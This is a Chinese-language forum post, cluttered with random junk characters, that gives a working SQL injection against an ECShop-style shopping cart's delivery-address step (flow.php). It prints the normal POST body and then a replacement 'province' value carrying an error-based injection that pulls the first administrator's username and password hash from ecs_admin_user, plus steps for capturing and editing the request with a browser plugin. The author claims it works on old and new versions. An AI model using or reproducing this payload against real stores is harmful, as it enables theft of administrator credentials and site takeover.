感谢欠杀的黑盒
+ r W4 B. f$ [0 _# U2 ?; J; j |' b% g% g: j) k w" _: M
" r2 W6 S1 ?5 x6 {5 C* U
把任意商品加入购物车在填写配送地址那一页,有地区选择
; d! V3 ~% u( A8 t. K
4 r- X# L% C( o+ y7 r0 ~5 jflow.php?step=consignee&direct_shopping=1
. w) H( w! T+ K, |" V5 P比如省选择安徽) O1 T( |5 o' ~0 D
7 x' V1 r) `7 `. O+ ^2 Y) v! X5 P
其中POST数据如下/ D5 e0 G2 \8 z# Q2 R r: o
- B9 z- @0 h" p3 k" m/ O! Y/ T J
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=35 T8 n8 g+ D. x- o4 ] A) n+ p- W
改成
~# s, j7 ~2 a
9 y9 g, `, N1 S3 Q* m/ `/ fprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
# ^6 H- ^" B5 e( p9 p, \% ops:详细的方法,用火狐tamper data插件……..即可改post内容…..
9 H* t6 i; y% g$ Z1 P; K & v$ S1 c1 @; J" [' `! G1 }
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
% g( J; Q; C: b" V: Y ! A G: r4 N( `% E$ v! k* Z
就会回显错误页面了。。。。
8 g; l- N A/ G$ y5 s& q 3 [! B- O2 \3 ]3 x
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
9 s8 P' _5 P, H( v |